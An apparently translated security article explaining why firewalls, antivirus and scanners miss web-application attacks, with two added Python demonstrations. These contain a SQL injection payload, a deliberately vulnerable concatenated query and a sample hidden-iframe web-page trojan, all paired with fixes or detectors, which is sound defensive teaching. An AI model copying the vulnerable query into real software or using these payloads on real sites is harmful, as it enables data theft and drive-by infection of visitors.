A website designer thinks mostly about meeting the user's requirements and implementing the business logic, and rarely considers the vulnerabilities that creep into a web application during development. Vulnerabilities that nobody paid attention to at design time are almost invisible in the code, and most developers, site designers and site maintainers know little about website defence; during normal use, even an existing vulnerability goes unnoticed by ordinary users. But once an attacker notices a vulnerability and makes full use of it, it becomes an opportunity for direct or indirect gain. Taking the SQL injection vulnerability of web applications as an example, a sampling test of 1,000 sites found SQL injection vulnerabilities on 11.3% of them.
The website environment has changed greatly: the threats now come mostly from the web application layer, yet the security measures of most sites are still built on the original understanding of the threat. Often a site only learns that it has been compromised and is serving web-page trojans (the "hanging horse" defacement) when it investigates visitor complaints or a notice from the regulator, and by then the loss is already irreparable. Many people ask: my website already has security measures, so why does this still happen? Let's analyse the existing security measures.
Firewalls, anti-virus and vulnerability scanning are the widely used traditional website security measures. Firewall deployment in particular blocks most network-layer attacks on a site and plays an important role. But in the face of the new situation, can these traditional measures still cope?
Firewall
With a network access control policy enabled, the firewall blocks access to the website's other service ports and allows only the HTTP service port, so vulnerability scanning and attack attempts based on other protocols and ports are stopped. But the web-application-layer attacks now in fashion look, to the firewall, just like normal web access: a SQL injection payload arrives inside an ordinary HTTP request to the one port the policy has to allow. The firewall cannot recognise or block it, and blocking that port would cut off normal web access as well.
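The following is an added example, not code from the original post, that makes the two points above concrete: a port-based access control list passes a SQL injection request because it is a well-formed HTTP request to port 80, and the only thing that stops it is how the application builds its query. The firewall model, the two HTTP request lines, the sqlite user table and the lookup functions are all constructed for this illustration.

```python
"""Added example (not from the original article): why a port-based firewall
cannot tell a SQL injection from a normal request, and what actually stops it.

The firewall model, the two HTTP requests, the user table and the lookup
functions are all constructed for illustration.
"""
import sqlite3
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# The network access control policy: only the web ports are open.  The
# destination port is all a network-layer ACL gets to decide on.
ALLOWED_PORTS = {80, 443}


def firewall_allows(dst_port: int) -> bool:
    """Stateless port filter, the only decision a network-layer ACL can make."""
    return dst_port in ALLOWED_PORTS


# Constructed requests, each as (destination port, HTTP request line).  On the
# wire both are ordinary GETs to port 80; the second carries the classic
# payload  x' OR '1'='1  percent-encoded in the query string.
BENIGN_REQUEST = (80, "GET /user?name=alice HTTP/1.1")
ATTACK_REQUEST = (80, "GET /user?name=x%27%20OR%20%271%27%3D%271 HTTP/1.1")


def request_name(request_line: str) -> str:
    """Extract the 'name' query parameter, as the web application would."""
    _method, target, _version = request_line.split(" ")
    return parse_qs(urlsplit(target).query)["name"][0]


def build_db() -> sqlite3.Connection:
    """A constructed in-memory user table standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "alice@example.com"),
         ("bob", "bob@example.com"),
         ("carol", "carol@example.com")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Deliberately vulnerable: the value is concatenated into the SQL, so the
    payload's quote closes the string and the OR clause matches every row."""
    sql = "SELECT name FROM users WHERE name = '" + name + "' ORDER BY name"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    """Hardened: a parameterised query keeps the payload a plain string value."""
    sql = "SELECT name FROM users WHERE name = ? ORDER BY name"
    return [row[0] for row in conn.execute(sql, (name,))]


def handle(request) -> Optional[dict]:
    """The firewall, then the application: None if the ACL dropped the
    request, otherwise what each version of the lookup returned."""
    dst_port, request_line = request
    if not firewall_allows(dst_port):
        return None
    conn = build_db()
    name = request_name(request_line)
    return {"vulnerable": lookup_vulnerable(conn, name),
            "safe": lookup_safe(conn, name)}


if __name__ == "__main__":
    for request in (BENIGN_REQUEST, ATTACK_REQUEST):
        print(request[1], "->", handle(request))
```

Both requests pass `firewall_allows` because both target port 80; the vulnerable lookup returns every user for the attack request while the parameterised one returns nothing, which is exactly the distinction the firewall never gets to see.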
Antivirus
Whether it is deployed at the gateway or on the web server, an anti-virus system detects and blocks viruses effectively, but it cannot identify malicious code embedded in a web page, that is, a web-page trojan. A web-page trojan usually appears as an ordinary script in the page's code, and when it is executed in the visitor's browser it can download harmful programs or steal the victim's private data directly. In the same way, anti-virus systems find it even harder to identify vulnerabilities in web applications.
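As an added example, not code from the original post, the block below shows why a byte-for-byte signature match on the served page misses a web-page trojan that looks like an ordinary script, and what a page-aware check has to do instead: decode what the script would write and look for iframes the visitor is not meant to see. The sample page, the exploit URL and the signature list are constructed for this illustration; the injected tag is percent-encoded with urllib so that the literal URL never appears in the HTML as served.

```python
"""Added example (not from the original article): why a signature check on the
raw page misses a web-page trojan, and what a page-aware check has to do.

The sample page, the iframe URL and the signature list are constructed for
this illustration.
"""
import re
from urllib.parse import quote, unquote

# Constructed attacker payload: an invisible iframe pointing at the exploit
# page, hidden inside a document.write(unescape("...")) call.
MALICIOUS_URL = "http://malware.example.invalid/exploit.html"
INJECTED_TAG = f'<iframe src="{MALICIOUS_URL}" width="0" height="0"></iframe>'
TROJAN_SCRIPT = ('<script>document.write(unescape("'
                 + quote(INJECTED_TAG, safe="") + '"));</script>')

# Constructed page: ordinary content plus the attacker's script appended at
# the end, which is how a compromised page usually looks.
SAMPLE_PAGE = f"""<html><head><title>News</title></head>
<body><h1>Welcome</h1><p>Today's headlines.</p>
<script>var visits = 3; document.title = "News (" + visits + ")";</script>
{TROJAN_SCRIPT}
</body></html>"""

# A list of known bad URLs, matched literally the way an anti-virus engine
# matches a known sample.
URL_SIGNATURES = {MALICIOUS_URL}


def signature_scan(html: str) -> bool:
    """Literal match against the page text it is given."""
    return any(sig in html for sig in URL_SIGNATURES)


UNESCAPE_CALL = re.compile(r'unescape\(\s*"([^"]*)"\s*\)')
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ZERO_SIZE = re.compile(r"""\b(?:width|height)\s*=\s*["']?0["']?(?![\d.])""", re.I)
DISPLAY_NONE = re.compile(r"display\s*:\s*none", re.I)


def decoded_view(html: str) -> str:
    """Replace every unescape("...") literal with what it decodes to, which is
    the only way to see the tag the browser will actually write."""
    return UNESCAPE_CALL.sub(lambda m: unquote(m.group(1)), html)


def is_hidden(tag: str) -> bool:
    """Heuristic for an iframe the visitor is not meant to see."""
    return bool(ZERO_SIZE.search(tag) or DISPLAY_NONE.search(tag))


def hidden_iframes(html: str) -> list:
    """Hidden iframes present in the page once its scripts are decoded."""
    return [tag for tag in IFRAME_TAG.findall(decoded_view(html)) if is_hidden(tag)]


if __name__ == "__main__":
    print("raw signature match:", signature_scan(SAMPLE_PAGE))
    print("decoded signature match:", signature_scan(decoded_view(SAMPLE_PAGE)))
    print("hidden iframes:", hidden_iframes(SAMPLE_PAGE))
```

The raw signature scan reports nothing because the URL only exists in percent-encoded form; the same signature fires once the `unescape` literal is decoded, and the zero-size iframe heuristic finds the injected tag without needing to know the URL at all. Real injected scripts use many more encodings than `unescape`, so this decoder is the minimum a page-aware check needs, not a complete one.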
Vulnerability scanning
A vulnerability scanning system, backed by its vulnerability database, plays a significant role in finding and fixing vulnerabilities in operating systems and in web publishing platforms such as IIS and Apache. But as a general-purpose tool its ability to recognise web application vulnerabilities is limited: a web application vulnerability is not a defect in a specific piece of software or service, and it takes complex and varied forms, so in practice the output of an automated checking tool has to be confirmed by manual review before a finding can be located accurately.
To sum up, identifying and blocking attacks based on web vulnerabilities is hard to do with traditional security measures such as vulnerability scanning, network access control and virus detection. In view of this new class of website security threat, we should keep a proper sense of urgency and take effective measures to deal with it.